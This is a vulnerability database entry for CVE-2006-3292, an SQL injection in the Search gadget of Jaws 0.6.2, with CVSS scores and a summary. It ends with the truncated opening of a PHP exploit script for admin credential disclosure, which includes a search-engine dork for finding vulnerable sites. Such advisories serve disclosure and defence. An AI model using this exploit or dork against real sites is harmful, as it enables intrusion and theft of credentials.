7.5
CVSSv2

CVE-2006-3292

Published: 28/06/2006 Updated: 18/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in the Search gadget in Jaws 0.6.2 allows remote malicious users to execute arbitrary SQL commands via queries with the "LIKE" keyword in the searchdata parameter (search field).

Vulnerable Product Search on Vulmon Subscribe to Product

jaws jaws 0.6.2

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "Jaws <= 062 'Search gadget' SQL injection / admin credentials disclosure\r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n"; echo "dork: \"powered by jaws\" | \"powered by the jaws project\" | inurl:?gadget=search\r\n\r\n"; /* works regardless of phpi ...